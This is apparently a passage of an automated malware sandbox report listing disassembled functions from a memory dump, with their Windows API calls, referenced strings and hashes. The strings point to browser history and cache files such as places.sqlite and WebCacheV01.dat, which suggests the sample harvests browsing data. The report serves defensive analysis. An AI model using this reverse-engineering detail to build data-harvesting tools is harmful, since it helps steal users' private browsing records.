                                                  • memset.MSVCRT ref: 00408828
                                                  • memset.MSVCRT ref: 00408840
                                                  • memset.MSVCRT ref: 00408858
                                                  • memset.MSVCRT ref: 00408870
                                                  • memset.MSVCRT ref: 00408888
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 2911713577-0
                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp
                                                  • String ID: @ $SQLite format 3
                                                  • API String ID: 1475443563-3708268960
                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  • memset.MSVCRT ref: 00414C87
                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 2705122986-2036018995
                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 1579243037-1578091866
                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040E60F
                                                  • memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                  • API String ID: 3354267031-2114579845
                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                  • API String ID: 2221118986-1725073988
                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotificationSleep
                                                  • String ID: }A
                                                  • API String ID: 1821831730-2138825249
                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DeleteObject
                                                  • String ID: r!A
                                                  • API String ID: 1103273653-628097481
                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  • memcmp.MSVCRT ref: 00444BA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$memcmp
                                                  • String ID: $$8
                                                  • API String ID: 2808797137-435121686
                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • duplicate column name: %s, xrefs: 004307FE
                                                  • too many columns on %s, xrefs: 00430763
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                  • API String ID: 0-1445880494
                                                  • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                  • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                  • String ID:
                                                  • API String ID: 1042154641-0
                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                  • String ID:
                                                  • API String ID: 2947809556-0
                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                  • memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                  • String ID: history.dat$places.sqlite
                                                  • API String ID: 3093078384-467022611
                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                  • GetLastError.KERNEL32 ref: 00417627
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$File$PointerRead
                                                  • String ID:
                                                  • API String ID: 839530781-0
                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID: *.*$index.dat
                                                  • API String ID: 1974802433-2863569691
                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FilePointer
                                                  • String ID:
                                                  • API String ID: 1156039329-0
                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ChangeCloseCreateFindNotificationTime
                                                  • String ID:
                                                  • API String ID: 1631957507-0
                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                  • String ID:
                                                  • API String ID: 1125800050-0
                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                  • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
